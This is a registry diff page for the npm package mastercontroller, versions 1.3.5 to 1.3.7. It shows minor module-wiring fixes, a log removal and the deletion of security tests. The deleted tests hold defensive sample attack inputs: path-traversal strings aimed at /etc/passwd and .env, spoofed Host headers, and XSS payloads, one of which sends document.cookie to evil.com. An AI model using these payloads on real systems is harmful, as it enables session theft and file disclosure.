npm - mastercontroller - Versions diffs - 1.3.5 → 1.3.7 - Mend

mastercontroller 1.3.5 → 1.3.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (8) hide show

package/MasterActionFilters.js +2 -2
package/MasterHtml.js +2 -2
package/package.json +1 -1
package/log/mastercontroller.log +0 -6
package/test/security/filters.test.js +0 -276
package/test/security/https.test.js +0 -214
package/test/security/path-traversal.test.js +0 -222
package/test/security/xss.test.js +0 -190

package/MasterActionFilters.js CHANGED Viewed

@@ -212,7 +212,7 @@ module.exports = MasterActionFilters;
 setImmediate(() => {
 	const master = require('./MasterControl');
-	if (master && MasterActionFilters._master.extendController) {
-		MasterActionFilters._master.extendController(MasterActionFilters);
+	if (master && master.extendController) {
+		master.extendController(MasterActionFilters);
 	}
 });

package/MasterHtml.js CHANGED Viewed

@@ -642,8 +642,8 @@ module.exports = html;
 setImmediate(() => {
 	const master = require('./MasterControl');
-	if (master && this._master.extendView) {
-		this._master.extendView("html", html);
+	if (master && master.extendView) {
+		master.extendView("html", html);
 	}
 });

package/package.json CHANGED Viewed

@@ -18,5 +18,5 @@
   "scripts": {
     "test": "echo \"Error: no test specified\" && exit 1"
   },
-  "version": "1.3.5"
+  "version": "1.3.7"
 }

package/log/mastercontroller.log DELETED Viewed

@@ -1,6 +0,0 @@
-{"timestamp":"2026-01-12T04:14:50.003Z","sessionId":"1768191290002-rdd9gdt0u","level":"INFO","code":"MC_INFO_FRAMEWORK_START","message":"MasterController framework initializing","component":null,"file":null,"line":null,"route":null,"context":{"version":"1.0.247","nodeVersion":"v20.19.4","platform":"darwin","env":"development"},"stack":null,"originalError":null,"environment":"development","nodeVersion":"v20.19.4","platform":"darwin","memory":{"rss":45973504,"heapTotal":10027008,"heapUsed":5702056,"external":2111800,"arrayBuffers":65875},"uptime":0.020569625}
-{"timestamp":"2026-01-12T04:14:50.004Z","sessionId":"1768191290002-rdd9gdt0u","level":"INFO","code":"MC_INFO_SECURITY_INITIALIZED","message":"Security features initialized","component":null,"file":null,"line":null,"route":null,"context":{"environment":"development","features":{"securityHeaders":true,"csp":true,"csrf":true,"rateLimit":true,"sessionSecurity":true}},"stack":null,"originalError":null,"environment":"development","nodeVersion":"v20.19.4","platform":"darwin","memory":{"rss":46071808,"heapTotal":10027008,"heapUsed":5711312,"external":2111840,"arrayBuffers":65875},"uptime":0.02096325}
-{"timestamp":"2026-01-12T04:15:57.995Z","sessionId":"1768191357993-yidd7mdf3","level":"INFO","code":"MC_INFO_FRAMEWORK_START","message":"MasterController framework initializing","component":null,"file":null,"line":null,"route":null,"context":{"version":"1.0.247","nodeVersion":"v20.19.4","platform":"darwin","env":"development"},"stack":null,"originalError":null,"environment":"development","nodeVersion":"v20.19.4","platform":"darwin","memory":{"rss":46071808,"heapTotal":10027008,"heapUsed":5704048,"external":2111800,"arrayBuffers":65875},"uptime":0.028868209}
-{"timestamp":"2026-01-12T04:15:57.996Z","sessionId":"1768191357993-yidd7mdf3","level":"INFO","code":"MC_INFO_SECURITY_INITIALIZED","message":"Security features initialized","component":null,"file":null,"line":null,"route":null,"context":{"environment":"development","features":{"securityHeaders":true,"csp":true,"csrf":true,"rateLimit":true,"sessionSecurity":true}},"stack":null,"originalError":null,"environment":"development","nodeVersion":"v20.19.4","platform":"darwin","memory":{"rss":46186496,"heapTotal":10027008,"heapUsed":5717648,"external":2111840,"arrayBuffers":65875},"uptime":0.029321334}
-{"timestamp":"2026-01-12T04:18:21.176Z","sessionId":"1768191501175-7uo5arhdx","level":"INFO","code":"MC_INFO_FRAMEWORK_START","message":"MasterController framework initializing","component":null,"file":null,"line":null,"route":null,"context":{"version":"1.0.247","nodeVersion":"v20.19.4","platform":"darwin","env":"development"},"stack":null,"originalError":null,"environment":"development","nodeVersion":"v20.19.4","platform":"darwin","memory":{"rss":46170112,"heapTotal":10027008,"heapUsed":5714584,"external":2111800,"arrayBuffers":65875},"uptime":0.033223041}
-{"timestamp":"2026-01-12T04:18:21.177Z","sessionId":"1768191501175-7uo5arhdx","level":"INFO","code":"MC_INFO_SECURITY_INITIALIZED","message":"Security features initialized","component":null,"file":null,"line":null,"route":null,"context":{"environment":"development","features":{"securityHeaders":true,"csp":true,"csrf":true,"rateLimit":true,"sessionSecurity":true}},"stack":null,"originalError":null,"environment":"development","nodeVersion":"v20.19.4","platform":"darwin","memory":{"rss":46268416,"heapTotal":10027008,"heapUsed":5728184,"external":2111840,"arrayBuffers":65875},"uptime":0.033683333}

package/test/security/filters.test.js DELETED Viewed

@@ -1,276 +0,0 @@
-// Action Filter Tests for MasterActionFilters.js
-const master = require('../../MasterControl');
-require('../../MasterActionFilters');
-describe('Action Filters - Fixed Architecture', () => {
-	class TestController {
-		constructor() {
-			this.__namespace = 'test';
-			this._beforeActionFilters = [];
-			this._afterActionFilters = [];
-			// Import methods from MasterActionFilters
-			Object.assign(this, master.controllerExtensions);
-		}
-	}
-	describe('Multiple Filters Support', () => {
-		test('should support multiple beforeAction filters', () => {
-			const controller = new TestController();
-			controller.beforeAction(['show'], () => console.log('Filter 1'));
-			controller.beforeAction(['show'], () => console.log('Filter 2'));
-			controller.beforeAction(['edit'], () => console.log('Filter 3'));
-			// Should have 3 filters
-			expect(controller._beforeActionFilters).toHaveLength(3);
-		});
-		test('should not overwrite previous filters', () => {
-			const controller = new TestController();
-			controller.beforeAction(['show'], () => 'first');
-			controller.beforeAction(['show'], () => 'second');
-			// Both filters should exist
-			expect(controller._beforeActionFilters[0].callBack()).toBe('first');
-			expect(controller._beforeActionFilters[1].callBack()).toBe('second');
-		});
-		test('should support multiple afterAction filters', () => {
-			const controller = new TestController();
-			controller.afterAction(['index'], () => {});
-			controller.afterAction(['index'], () => {});
-			expect(controller._afterActionFilters).toHaveLength(2);
-		});
-	});
-	describe('Instance-Level Filters (Not Global)', () => {
-		test('should not share filters between controllers', () => {
-			const controller1 = new TestController();
-			const controller2 = new TestController();
-			controller1.__namespace = 'users';
-			controller2.__namespace = 'posts';
-			controller1.beforeAction(['show'], () => 'users filter');
-			controller2.beforeAction(['index'], () => 'posts filter');
-			// Each controller has independent filters
-			expect(controller1._beforeActionFilters).toHaveLength(1);
-			expect(controller2._beforeActionFilters).toHaveLength(1);
-			expect(controller1._beforeActionFilters[0].namespace).toBe('users');
-			expect(controller2._beforeActionFilters[0].namespace).toBe('posts');
-		});
-		test('should not have race conditions between requests', () => {
-			// Simulate two concurrent requests
-			const request1Controller = new TestController();
-			const request2Controller = new TestController();
-			request1Controller.__namespace = 'users';
-			request2Controller.__namespace = 'admin';
-			request1Controller.beforeAction(['show'], () => 'request 1');
-			request2Controller.beforeAction(['dashboard'], () => 'request 2');
-			// Each request has its own filter state
-			expect(request1Controller._beforeActionFilters[0].callBack()).toBe('request 1');
-			expect(request2Controller._beforeActionFilters[0].callBack()).toBe('request 2');
-		});
-	});
-	describe('Filter Execution', () => {
-		test('should execute all matching filters in order', async () => {
-			const controller = new TestController();
-			const executionOrder = [];
-			controller.beforeAction(['show'], () => executionOrder.push('first'));
-			controller.beforeAction(['show'], () => executionOrder.push('second'));
-			controller.beforeAction(['show'], () => executionOrder.push('third'));
-			const request = {
-				toAction: 'show',
-				response: { _headerSent: false, headersSent: false }
-			};
-			await controller.__callBeforeAction(controller, request, null);
-			expect(executionOrder).toEqual(['first', 'second', 'third']);
-		});
-		test('should only execute filters for matching actions', async () => {
-			const controller = new TestController();
-			const executed = [];
-			controller.beforeAction(['show'], () => executed.push('show'));
-			controller.beforeAction(['edit'], () => executed.push('edit'));
-			controller.beforeAction(['destroy'], () => executed.push('destroy'));
-			const request = {
-				toAction: 'show',
-				response: { _headerSent: false, headersSent: false }
-			};
-			await controller.__callBeforeAction(controller, request, null);
-			expect(executed).toEqual(['show']);
-		});
-	});
-	describe('Async Support', () => {
-		test('should support async filters', async () => {
-			const controller = new TestController();
-			let asyncCompleted = false;
-			controller.beforeAction(['index'], async () => {
-				await new Promise(resolve => setTimeout(resolve, 10));
-				asyncCompleted = true;
-			});
-			const request = {
-				toAction: 'index',
-				response: { _headerSent: false, headersSent: false }
-			};
-			await controller.__callBeforeAction(controller, request, null);
-			expect(asyncCompleted).toBe(true);
-		});
-		test('should await each filter before continuing', async () => {
-			const controller = new TestController();
-			const order = [];
-			controller.beforeAction(['index'], async () => {
-				order.push('start-1');
-				await new Promise(resolve => setTimeout(resolve, 20));
-				order.push('end-1');
-			});
-			controller.beforeAction(['index'], async () => {
-				order.push('start-2');
-				await new Promise(resolve => setTimeout(resolve, 10));
-				order.push('end-2');
-			});
-			const request = {
-				toAction: 'index',
-				response: { _headerSent: false, headersSent: false }
-			};
-			await controller.__callBeforeAction(controller, request, null);
-			// Should execute in order, awaiting each
-			expect(order).toEqual(['start-1', 'end-1', 'start-2', 'end-2']);
-		});
-	});
-	describe('Error Handling', () => {
-		test('should catch and log filter errors', async () => {
-			const controller = new TestController();
-			controller.beforeAction(['index'], () => {
-				throw new Error('Filter error');
-			});
-			const request = {
-				toAction: 'index',
-				response: {
-					_headerSent: false,
-					headersSent: false,
-					writeHead: jest.fn(),
-					end: jest.fn()
-				}
-			};
-			await expect(
-				controller.__callBeforeAction(controller, request, null)
-			).rejects.toThrow('Filter error');
-			// Should send error response
-			expect(request.response.writeHead).toHaveBeenCalledWith(500, expect.any(Object));
-		});
-		test('should stop filter chain on error', async () => {
-			const controller = new TestController();
-			const executed = [];
-			controller.beforeAction(['index'], () => {
-				executed.push('first');
-				throw new Error('Stop here');
-			});
-			controller.beforeAction(['index'], () => {
-				executed.push('second'); // Should not execute
-			});
-			const request = {
-				toAction: 'index',
-				response: {
-					_headerSent: false,
-					headersSent: false,
-					writeHead: jest.fn(),
-					end: jest.fn()
-				}
-			};
-			try {
-				await controller.__callBeforeAction(controller, request, null);
-			} catch (e) {}
-			expect(executed).toEqual(['first']);
-		});
-	});
-	describe('Timeout Protection', () => {
-		test('should timeout slow filters', async () => {
-			const controller = new TestController();
-			controller.beforeAction(['index'], async () => {
-				// Simulate slow operation (6 seconds, timeout is 5 seconds)
-				await new Promise(resolve => setTimeout(resolve, 6000));
-			});
-			const request = {
-				toAction: 'index',
-				response: {
-					_headerSent: false,
-					headersSent: false,
-					writeHead: jest.fn(),
-					end: jest.fn()
-				}
-			};
-			await expect(
-				controller.__callBeforeAction(controller, request, null)
-			).rejects.toThrow(/timeout/i);
-		}, 10000); // Increase test timeout
-	});
-	describe('Variable Shadowing Fix', () => {
-		test('should not have variable shadowing bugs', async () => {
-			const controller = new TestController();
-			const actions = ['show', 'edit', 'destroy'];
-			// This used to cause bugs due to variable shadowing
-			controller.beforeAction(actions, (req) => {
-				// Action list should be properly iterated
-			});
-			const request = {
-				toAction: 'edit',
-				response: { _headerSent: false, headersSent: false }
-			};
-			// Should execute without errors
-			await expect(
-				controller.__callBeforeAction(controller, request, null)
-			).resolves.not.toThrow();
-		});
-	});
-});

package/test/security/https.test.js DELETED Viewed

@@ -1,214 +0,0 @@
-// HTTPS and Open Redirect Protection Tests
-const master = require('../../MasterControl');
-require('../../MasterAction');
-describe('HTTPS and Open Redirect Protection', () => {
-	class MockController {
-		constructor() {
-			Object.assign(this, master.controllerExtensions);
-			this.__requestObject = {
-				request: {
-					connection: {},
-					headers: {}
-				},
-				response: {
-					_headerSent: false,
-					headersSent: false,
-					writeHead: jest.fn(),
-					end: jest.fn(),
-					setHeader: jest.fn()
-				},
-				pathName: '/login'
-			};
-		}
-		redirectTo(url) {
-			this.__requestObject.response.writeHead(302, { 'Location': url });
-			this.__requestObject.response.end();
-		}
-		returnError(code, message) {
-			this.__requestObject.response.writeHead(code, { 'Content-Type': 'application/json' });
-			this.__requestObject.response.end(JSON.stringify({ error: message }));
-		}
-	}
-	describe('requireHTTPS() - Open Redirect Fix', () => {
-		beforeEach(() => {
-			// Setup test environment
-			master.env = master.env || {};
-			master.env.server = {
-				hostname: 'example.com',
-				httpsPort: 443
-			};
-		});
-		test('should NOT use Host header from request', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			controller.__requestObject.request.headers.host = 'evil.com';
-			controller.requireHTTPS();
-			// Should redirect to configured host, NOT Host header
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-			expect(redirectCall).toBeTruthy();
-			expect(redirectCall[1].Location).toBe('https://example.com/login');
-			expect(redirectCall[1].Location).not.toContain('evil.com');
-		});
-		test('should use configured hostname', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			master.env.server.hostname = 'myapp.com';
-			controller.requireHTTPS();
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-			expect(redirectCall[1].Location).toBe('https://myapp.com/login');
-		});
-		test('should include port if not 443', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			master.env.server.hostname = 'example.com';
-			master.env.server.httpsPort = 8443;
-			controller.requireHTTPS();
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-			expect(redirectCall[1].Location).toBe('https://example.com:8443/login');
-		});
-		test('should return error if hostname not configured', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			master.env.server.hostname = 'localhost';
-			const result = controller.requireHTTPS();
-			expect(result).toBe(false);
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(500, expect.any(Object));
-		});
-		test('should allow request if already HTTPS', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = true;
-			const result = controller.requireHTTPS();
-			expect(result).toBe(true);
-			expect(controller.__requestObject.response.writeHead).not.toHaveBeenCalled();
-		});
-		test('should detect HTTPS from X-Forwarded-Proto header', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			controller.__requestObject.request.headers['x-forwarded-proto'] = 'https';
-			const result = controller.requireHTTPS();
-			expect(result).toBe(true);
-		});
-	});
-	describe('isSecure()', () => {
-		test('should return true for encrypted connection', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = true;
-			expect(controller.isSecure()).toBe(true);
-		});
-		test('should return true for X-Forwarded-Proto: https', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.headers['x-forwarded-proto'] = 'https';
-			expect(controller.isSecure()).toBe(true);
-		});
-		test('should return false for HTTP', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			controller.__requestObject.request.headers['x-forwarded-proto'] = 'http';
-			expect(controller.isSecure()).toBe(false);
-		});
-	});
-	describe('Real-World Attack Scenarios', () => {
-		beforeEach(() => {
-			master.env = master.env || {};
-			master.env.server = {
-				hostname: 'legitimate.com',
-				httpsPort: 443
-			};
-		});
-		test('should prevent phishing via Host header manipulation', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			// Attacker sets malicious Host header
-			controller.__requestObject.request.headers.host = 'phishing-site.com';
-			controller.__requestObject.pathName = '/login';
-			controller.requireHTTPS();
-			// Should redirect to legitimate site, not attacker's
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-			expect(redirectCall[1].Location).toBe('https://legitimate.com/login');
-			expect(redirectCall[1].Location).not.toContain('phishing-site.com');
-		});
-		test('should prevent redirect to external domain', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			// Attacker tries various Host header values
-			const maliciousHosts = [
-				'evil.com',
-				'attacker.net',
-				'phishing.org',
-				'legitimate.com.evil.com'
-			];
-			maliciousHosts.forEach(host => {
-				controller.__requestObject.request.headers.host = host;
-				controller.__requestObject.response.writeHead.mockClear();
-				controller.requireHTTPS();
-				const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-				const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-				expect(redirectCall[1].Location).toBe('https://legitimate.com/login');
-			});
-		});
-		test('should preserve original path in redirect', () => {
-			const controller = new MockController();
-			controller.__requestObject.request.connection.encrypted = false;
-			controller.__requestObject.pathName = '/admin/users/123';
-			controller.requireHTTPS();
-			const writeHeadCalls = controller.__requestObject.response.writeHead.mock.calls;
-			const redirectCall = writeHeadCalls.find(call => call[0] === 302);
-			expect(redirectCall[1].Location).toBe('https://legitimate.com/admin/users/123');
-		});
-	});
-});

package/test/security/path-traversal.test.js DELETED Viewed

@@ -1,222 +0,0 @@
-// Path Traversal Protection Tests
-const master = require('../../MasterControl');
-require('../../MasterAction');
-require('../../MasterHtml');
-describe('Path Traversal Protection', () => {
-	describe('MasterAction - returnPartialView()', () => {
-		class MockController {
-			constructor() {
-				Object.assign(this, master.controllerExtensions);
-				this.__requestObject = {
-					response: {
-						_headerSent: false,
-						headersSent: false,
-						writeHead: jest.fn(),
-						end: jest.fn()
-					}
-				};
-			}
-			returnError(code, message) {
-				this.__requestObject.response.writeHead(code, { 'Content-Type': 'application/json' });
-				this.__requestObject.response.end(JSON.stringify({ error: message }));
-			}
-		}
-		test('should reject ../ path traversal', () => {
-			const controller = new MockController();
-			const result = controller.returnPartialView('../../etc/passwd', {});
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-			expect(result).toBe('');
-		});
-		test('should reject absolute paths', () => {
-			const controller = new MockController();
-			const result = controller.returnPartialView('/etc/passwd', {});
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-			expect(result).toBe('');
-		});
-		test('should reject ~ home directory paths', () => {
-			const controller = new MockController();
-			const result = controller.returnPartialView('~/../../etc/passwd', {});
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-			expect(result).toBe('');
-		});
-		test('should allow safe relative paths', () => {
-			const controller = new MockController();
-			master.root = __dirname;
-			// This should not throw (though file may not exist)
-			try {
-				controller.returnPartialView('views/safe/partial.html', {});
-			} catch (e) {
-				// File not found is OK, as long as validation passed
-			}
-			// Should not have called returnError with 400 or 403
-			const calls = controller.__requestObject.response.writeHead.mock.calls;
-			const hasSecurityError = calls.some(call => [400, 403].includes(call[0]));
-			expect(hasSecurityError).toBe(false);
-		});
-	});
-	describe('MasterAction - returnViewWithoutEngine()', () => {
-		class MockController {
-			constructor() {
-				Object.assign(this, master.controllerExtensions);
-				this.__requestObject = {
-					response: {
-						_headerSent: false,
-						headersSent: false,
-						writeHead: jest.fn(),
-						end: jest.fn()
-					}
-				};
-			}
-			returnError(code, message) {
-				this.__requestObject.response.writeHead(code, { 'Content-Type': 'application/json' });
-				this.__requestObject.response.end(JSON.stringify({ error: message }));
-			}
-		}
-		test('should reject ../ path traversal', () => {
-			const controller = new MockController();
-			controller.returnViewWithoutEngine('../../../etc/passwd');
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-		});
-		test('should reject absolute paths', () => {
-			const controller = new MockController();
-			controller.returnViewWithoutEngine('/etc/passwd');
-			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
-		});
-	});
-	describe('MasterHtml - renderPartial()', () => {
-		let html;
-		beforeEach(() => {
-			html = master.viewList.html;
-			master.router.currentRoute = {
-				root: __dirname
-			};
-		});
-		test('should reject ../ path traversal', () => {
-			const result = html.renderPartial('../../etc/passwd', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-		test('should reject absolute paths', () => {
-			const result = html.renderPartial('/etc/passwd', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-		test('should reject ~ home directory', () => {
-			const result = html.renderPartial('~/config', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-		test('should allow safe relative paths', () => {
-			// Safe path should not return error
-			try {
-				const result = html.renderPartial('partials/safe.html', {});
-				// May return "not found" comment, but not "invalid path"
-				expect(result).not.toBe('<!-- Invalid path -->');
-			} catch (e) {
-				// File not found is OK
-			}
-		});
-	});
-	describe('MasterHtml - renderStyles()', () => {
-		let html;
-		beforeEach(() => {
-			html = master.viewList.html;
-			master.router.currentRoute = {
-				root: __dirname,
-				isComponent: false
-			};
-		});
-		test('should reject ../ in folder name', () => {
-			const result = html.renderStyles('../../../etc', ['css']);
-			expect(result).toBe('');
-		});
-		test('should reject absolute paths in folder name', () => {
-			const result = html.renderStyles('/etc/passwd', ['css']);
-			expect(result).toBe('');
-		});
-		test('should allow safe folder names', () => {
-			const result = html.renderStyles('pages', ['css']);
-			// Should return empty string if no files, but not fail validation
-			expect(typeof result).toBe('string');
-		});
-	});
-	describe('MasterHtml - renderScripts()', () => {
-		let html;
-		beforeEach(() => {
-			html = master.viewList.html;
-			master.router.currentRoute = {
-				root: __dirname,
-				isComponent: false
-			};
-		});
-		test('should reject ../ in folder name', () => {
-			const result = html.renderScripts('../../config', ['js']);
-			expect(result).toBe('');
-		});
-		test('should reject absolute paths', () => {
-			const result = html.renderScripts('/etc', ['js']);
-			expect(result).toBe('');
-		});
-		test('should allow safe folder names', () => {
-			const result = html.renderScripts('components', ['js']);
-			expect(typeof result).toBe('string');
-		});
-	});
-	describe('Real-World Attack Scenarios', () => {
-		test('should prevent reading /etc/passwd', () => {
-			const html = master.viewList.html;
-			master.router.currentRoute = { root: '/var/www/app' };
-			const result = html.renderPartial('../../../../../../../etc/passwd', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-		test('should prevent reading application config', () => {
-			const html = master.viewList.html;
-			master.router.currentRoute = { root: '/var/www/app' };
-			const result = html.renderPartial('../../config/database.yml', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-		test('should prevent reading .env files', () => {
-			const html = master.viewList.html;
-			master.router.currentRoute = { root: '/var/www/app' };
-			const result = html.renderPartial('../../.env', {});
-			expect(result).toBe('<!-- Invalid path -->');
-		});
-	});
-});

package/test/security/xss.test.js DELETED Viewed

@@ -1,190 +0,0 @@
-// XSS Protection Tests for MasterHtml.js
-const master = require('../../MasterControl');
-require('../../MasterHtml');
-describe('XSS Protection in Form Helpers', () => {
-	let html;
-	beforeEach(() => {
-		// Create html instance (it's extended to master.viewList)
-		html = master.viewList.html;
-	});
-	describe('linkTo()', () => {
-		test('should escape malicious script in name', () => {
-			const result = html.linkTo('<script>alert("XSS")</script>', '/safe');
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-		test('should escape malicious javascript in href', () => {
-			const result = html.linkTo('Click', 'javascript:alert("XSS")');
-			expect(result).toContain('href="javascript');
-			expect(result).not.toContain('href=javascript'); // Should be quoted
-		});
-		test('should escape quote injection', () => {
-			const result = html.linkTo('Click', '" onmouseover="alert(\'XSS\')"');
-			expect(result).toContain('&quot;');
-			expect(result).not.toContain('onmouseover=');
-		});
-	});
-	describe('imgTag()', () => {
-		test('should escape XSS in alt attribute', () => {
-			const result = html.imgTag('<script>alert("XSS")</script>', '/image.jpg');
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-		test('should escape onerror handler', () => {
-			const result = html.imgTag('test', '/image.jpg onerror=alert(1)');
-			expect(result).toContain('&quot;');
-			expect(result).toMatch(/src=".*onerror.*"/); // Should be quoted
-		});
-		test('should have proper attribute quoting', () => {
-			const result = html.imgTag('test', '/image.jpg');
-			expect(result).toMatch(/src="[^"]+"/);
-			expect(result).toMatch(/alt="[^"]+"/);
-		});
-	});
-	describe('textFieldTag()', () => {
-		test('should escape malicious name', () => {
-			const result = html.textFieldTag('<script>alert(1)</script>', {});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-		test('should escape malicious attributes', () => {
-			const result = html.textFieldTag('username', {
-				value: '"><script>alert(1)</script><input type="hidden'
-			});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&quot;&gt;&lt;script&gt;');
-		});
-		test('should properly quote all attributes', () => {
-			const result = html.textFieldTag('test', { value: 'normal', class: 'form-control' });
-			expect(result).toMatch(/name="[^"]+"/);
-			expect(result).toMatch(/value="[^"]+"/);
-			expect(result).toMatch(/class="[^"]+"/);
-		});
-	});
-	describe('hiddenFieldTag()', () => {
-		test('should escape malicious value', () => {
-			const result = html.hiddenFieldTag('test', '" onclick="alert(\'XSS\')"', {});
-			expect(result).not.toContain('onclick=');
-			expect(result).toContain('&quot;');
-		});
-		test('should escape additional attributes', () => {
-			const result = html.hiddenFieldTag('id', '123', {
-				'data-foo': '"><script>alert(1)</script>'
-			});
-			expect(result).not.toContain('<script>');
-		});
-	});
-	describe('textAreaTag()', () => {
-		test('should escape message content', () => {
-			const result = html.textAreaTag('comment', '<script>alert("XSS")</script>', {});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-		test('should escape attributes', () => {
-			const result = html.textAreaTag('comment', 'safe', {
-				placeholder: '"><script>alert(1)</script>'
-			});
-			expect(result).not.toContain('<script>');
-		});
-	});
-	describe('submitButton()', () => {
-		test('should escape button name', () => {
-			const result = html.submitButton('<script>alert(1)</script>', {});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&lt;script&gt;');
-		});
-		test('should escape attributes', () => {
-			const result = html.submitButton('Submit', {
-				onclick: 'alert(1)'
-			});
-			expect(result).toContain('onclick="alert(1)"'); // Escaped and quoted
-		});
-	});
-	describe('emailField()', () => {
-		test('should escape malicious attributes', () => {
-			const result = html.emailField('email', {
-				value: '"><script>alert(1)</script>'
-			});
-			expect(result).not.toContain('<script>');
-		});
-	});
-	describe('numberField()', () => {
-		test('should escape min/max/step values', () => {
-			const result = html.numberField('age', '"><script>alert(1)</script>', '100', '1', {});
-			expect(result).not.toContain('<script>');
-			expect(result).toContain('&quot;&gt;&lt;script&gt;');
-		});
-	});
-	describe('javaScriptSerializer()', () => {
-		test('should escape closing script tags', () => {
-			const data = { comment: '</script><script>alert("XSS")</script>' };
-			const result = html.javaScriptSerializer('userData', data);
-			// Should not contain unescaped </script>
-			expect(result).not.toMatch(/<\/script><script>/);
-			// Should contain escaped version
-			expect(result).toContain('\\u003c/script\\u003e');
-		});
-		test('should escape < and > characters', () => {
-			const data = { html: '<div>test</div>' };
-			const result = html.javaScriptSerializer('config', data);
-			expect(result).toContain('\\u003c');
-			expect(result).toContain('\\u003e');
-		});
-		test('should escape variable name', () => {
-			const result = html.javaScriptSerializer('<script>alert(1)</script>', { test: 'data' });
-			expect(result).toContain('&lt;script&gt;');
-		});
-	});
-	describe('Real-World Attack Scenarios', () => {
-		test('should prevent stored XSS attack', () => {
-			// Simulate stored XSS from database
-			const userComment = '<img src=x onerror=alert(document.cookie)>';
-			const result = html.textAreaTag('comment', userComment, {});
-			expect(result).not.toContain('onerror=');
-			expect(result).toContain('&lt;img');
-		});
-		test('should prevent reflected XSS attack', () => {
-			// Simulate reflected XSS from URL parameter
-			const searchQuery = '"><script>fetch("http://evil.com?c="+document.cookie)</script>';
-			const result = html.textFieldTag('search', { value: searchQuery });
-			expect(result).not.toContain('<script>');
-			expect(result).not.toContain('fetch(');
-		});
-		test('should prevent DOM-based XSS', () => {
-			const maliciousUrl = 'javascript:eval(atob("YWxlcnQoMSk="))';
-			const result = html.linkTo('Click', maliciousUrl);
-			// Should be quoted and escaped
-			expect(result).toMatch(/href="[^"]*"/);
-		});
-	});
-});